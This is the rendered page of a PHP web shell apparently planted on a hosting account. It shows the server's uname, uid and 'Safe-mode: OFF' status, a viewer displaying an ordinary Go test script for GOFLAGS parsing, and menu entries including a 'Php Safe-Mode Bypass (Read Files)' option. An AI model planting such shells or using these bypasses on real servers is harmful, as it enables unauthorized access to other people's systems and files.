![]() | |
---|---|
Software: Apache. PHP/5.4.45 uname -a: Linux webm056.cluster010.gra.hosting.ovh.net 5.15.167-ovh-vps-grsec-zfs-classid #1 SMP Tue uid=243112(mycochar) gid=100(users) groups=100(users) Safe-mode: OFF (not secure) /home/mycochar/www/image/photo/go/src/cmd/go/testdata/script/ drwxr-xr-x |
Viewing file: Select action/file-type: env GO111MODULE=off # GOFLAGS sets flags for commands env GOFLAGS='-e -f={{.Dir}} --test.benchtime=1s -count=10' go list asdfasdfasdf # succeeds because of -e go list runtime stdout '[\\/]runtime$' env GOFLAGS=-race OLDGOARCH=$GOARCH OLDGOOS=$GOOS GOARCH=386 GOOS=linux ! go list runtime stderr 'race is not supported on linux/386' env GOARCH=$OLDGOARCH GOOS=$OLDGOOS # go env succeeds even though -f={{.Dir}} is inappropriate go env # bad flags are diagnosed env GOFLAGS=-typoflag ! go list runtime stderr 'unknown flag -typoflag' env GOFLAGS=- ! go list runtime stderr '^go: parsing \$GOFLAGS: non-flag "-"' env GOFLAGS=-- ! go list runtime stderr '^go: parsing \$GOFLAGS: non-flag "--"' env GOFLAGS=---oops ! go list runtime stderr '^go: parsing \$GOFLAGS: non-flag "---oops"' env GOFLAGS=-=noname ! go list runtime stderr '^go: parsing \$GOFLAGS: non-flag "-=noname"' env GOFLAGS=-f ! go list runtime stderr '^go: flag needs an argument: -f \(from (\$GOFLAGS|%GOFLAGS%)\)$' env GOFLAGS=-e=asdf ! go list runtime stderr '^go: invalid boolean value \"asdf\" for flag -e \(from (\$GOFLAGS|%GOFLAGS%)\)' # except in go bug (untested) and go env go env stdout GOFLAGS # Flags listed in GOFLAGS should be safe to duplicate on the command line. env GOFLAGS=-tags=magic go list -tags=magic go test -tags=magic -c -o $devnull go vet -tags=magic # GOFLAGS uses the same quoting rules (quoted.Split) as the rest of # the go command env variables env GOFLAGS='"-tags=magic wizardry"' go list -- foo_test.go -- package foo |
Useful Commands
|
Php Safe-Mode Bypass (Read Files)
|
--[ x2300 Locus7Shell v. 1.0a beta Modded by #!physx^ | www.LOCUS7S.com | Generation time: 0.0053 ]-- |